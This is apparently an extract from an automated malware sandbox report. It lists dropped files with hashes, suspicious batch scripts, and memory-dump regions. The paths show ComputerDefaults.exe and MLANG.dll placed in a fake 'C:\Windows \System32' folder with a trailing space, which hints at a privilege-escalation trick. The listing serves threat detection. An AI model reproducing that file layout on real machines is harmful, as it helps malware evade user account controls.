97216e740a8bfe5cce5e385f2cdfa1eccc593df07f0795a564a290e8e6cd5d1c4f05ecca9d37fcd34e202f9cb28f305d133c45a44d8e059fb5f9126f37207914

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
adf4d82c40d2aac71fb9ad201f38aa95

SHA1
71249559ec07dffa9f04cafe4ce16d8d885c52d4

SHA256
ff4b9f3b8a6755d94286d4aa741cf41a6b4c8a85756c1f6b1e072874ccfd49f6

SHA512
fc4be96587b7af3eb5c6d4bfc2436e4c5f0f1059048151ea93db7607207b0093025d683c9ed83c578ad777bc909aa9b9759eee6c5a3828b0737a67ef4d1f893b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
83f560c375d5748b852002adee346b13

SHA1
df5fa473c3630cbd3fef336f1114c8df70c397e0

SHA256
2a12cbc9cea349a2f659dde1791d462ead7d30ed6c554b78eb52b3aa1479bd84

SHA512
bf8d05d8507ad00ab94c1dc9fadf15445c6d0d99c0a821432e25f8cd54a7dd7eccb7f389fab926d54c07d7a1abab24de9ab8838853f78dd14e8f48fcd1d76814

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
d670e63de8f1b4735d7c16e01cc0a1fe

SHA1
61a1df483688e4840972c9c0cae38e355d6688cf

SHA256
fd2b25599131ddbda3c84eaa8880a6955527904fa66a290441f279000d12579c

SHA512
1090f09532301e34af9d12ce4eb7ff2fb3f3bdda85aea0e3d9b8928d573d8f76e0bdd00273fcc896a3604354086af39cc12bb45c1ca45a2fda8cafb232199e5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2114288fdfc8e55f47611663569c81ab

SHA1
b90e27b1223903c32b629ba98f237ff177ccce85

SHA256
5d413dcfcf1f7570834cb23652183db100ab5213b4c7a40ac2c8849c2f5bf69a

SHA512
997e2b423b8b186b8e02114f52f56d560040705a77aa4c837fa49e003116523d049481625c68e2a96b2327f733af02b40b415ac1530a385ddddb4c4b20a8df8d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7cb28956e3986e5930f23b3249743360

SHA1
7859efd446f3141c9084f8378bc39701bf86a4a4

SHA256
4025207caa37a2e5a003f65d55ba195d5e720021172b16c2cc41acc714480382

SHA512
f659cba098ba6a991f0f0cf30906131bb66bd107e2d8088923bcd96f365a5840c70307ca08bb921e39adccd2ad13b0f4d1c0ae4728f3713187a5cdd5b9bb76b9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7bd9fd23ac2e102b3fdb80a91e7f41f0

SHA1
0718c8e88248378cea786419427833ee1f67281a

SHA256
062ba364e107e98d22c9d4adb9a9fca3435d3e17e5401209a718259466cc2951

SHA512
d38a5ed2db39d2f41a27b4e5489cc37993446524428f50a363e1c2e81ed3429adc783b3971bdb667eb588ab435c6a515ac9ce73f2b3682215b1563ca11a3e56e

Download Submit
C:\Users\Admin\AppData\Local\Temp\SC.cmd

Filesize
156KB

MD5
c88c0f71749f8575068070333359f5b5

SHA1
af3cbd68266ab3b90bef8db45f8e22e1f4d9d121

SHA256
d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb

SHA512
da549a0f953591baf4021dfb09f6b3afc0ff93dc58c430b90688583c5c43808393506389d97668b5f5d923b8258154d0a66c7f33ddaef7667bbf05fb45ef2fa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mht2unjq.caf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd

Filesize
1.6MB

MD5
d7239bc304b1d9d4ae192e2570419d53

SHA1
dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1

SHA256
7543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa

SHA512
d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430

Download Submit
C:\Windows \System32\ComputerDefaults.exe

Filesize
80KB

MD5
d25a9e160e3b74ef2242023726f15416

SHA1
27a9bb9d7628d442f9b5cf47711c906e3315755b

SHA256
7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

SHA512
bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

Download Submit
C:\Windows \System32\MLANG.dll

Filesize
131KB

MD5
3fe8b70f96a80f2735fe33b4bc13279e

SHA1
0dad73147db553deabd9794779109fa79ae5b656

SHA256
52b4a57474ce6ead77d4207ce740d95c9ca3c0c9b72b243a68484b4c49465f26

SHA512
3704b317a4c79b6795f6e88e3a1133b7b10a3a4dd48e93e99c85403e485b84d09c64e562a8887eaf816810777314876be4d8e083b0246e2de4a7fddc4e6c24bd

Download Submit
memory/624-26-0x00007FF92F2B0000-0x00007FF92FD71000-memory.dmp

Filesize
10.8MB

Download
memory/624-29-0x00007FF92F2B0000-0x00007FF92FD71000-memory.dmp

Filesize
10.8MB

Download
memory/624-20-0x00007FF92F2B0000-0x00007FF92FD71000-memory.dmp

Filesize
10.8MB

Download
memory/624-25-0x00007FF92F2B0000-0x00007FF92FD71000-memory.dmp

Filesize
10.8MB

Download
memory/932-94-0x0000021739990000-0x00000217399E0000-memory.dmp

Filesize
320KB

Download
memory/932-96-0x0000021739D30000-0x0000021739EF2000-memory.dmp

Filesize
1.8MB

Download
memory/932-100-0x0000021739A20000-0x0000021739A5C000-memory.dmp

Filesize
240KB

Download
memory/932-85-0x000002171E9C0000-0x000002171E9CC000-memory.dmp

Filesize
48KB

Download
memory/932-90-0x0000021738F90000-0x00000217390C2000-memory.dmp

Filesize
1.2MB

Download
memory/932-92-0x00000217390C0000-0x00000217393E4000-memory.dmp

Filesize
3.1MB

Download
memory/932-99-0x0000021739960000-0x0000021739972000-memory.dmp

Filesize
72KB

Download
memory/932-95-0x0000021739AA0000-0x0000021739B52000-memory.dmp

Filesize
712KB

Download
memory/2668-31-0x0000026973180000-0x000002697319E000-memory.dmp

Filesize
120KB

Download
memory/2668-73-0x00007FF92F2B3000-0x00007FF92F2B5000-memory.dmp

Filesize
8KB

Download
memory/2668-0-0x00007FF92F2B3000-0x00007FF92F2B5000-memory.dmp

Filesize
8KB

Download
memory/2668-79-0x00007FF92F2B0000-0x00007FF92FD71000-memory.dmp

Filesize
10.8MB

Download
memory/2668-30-0x00000269709A0000-0x00000269709AC000-memory.dmp

Filesize
48KB

Download
memory/2668-47-0x00007FF92F2B0000-0x00007FF92FD71000-memory.dmp

Filesize
10.8MB

Download
memory/2668-127-0x0000026973740000-0x000002697374E000-memory.dmp

Filesize
56KB

Download
memory/2668-14-0x0000026973620000-0x0000026973696000-memory.dmp

Filesize
472KB

Download
memory/2668-13-0x00000269731D0000-0x0000026973214000-memory.dmp

Filesize
272KB

Download
memory/2668-12-0x00007FF92F2B0000-0x00007FF92FD71000-memory.dmp

Filesize
10.8MB

Download
memory/2668-11-0x00007FF92F2B0000-0x00007FF92FD71000-memory.dmp

Filesize
10.8MB

Download
memory/2668-10-0x0000026970EB0000-0x0000026970ED2000-memory.dmp

Filesize
136KB

Download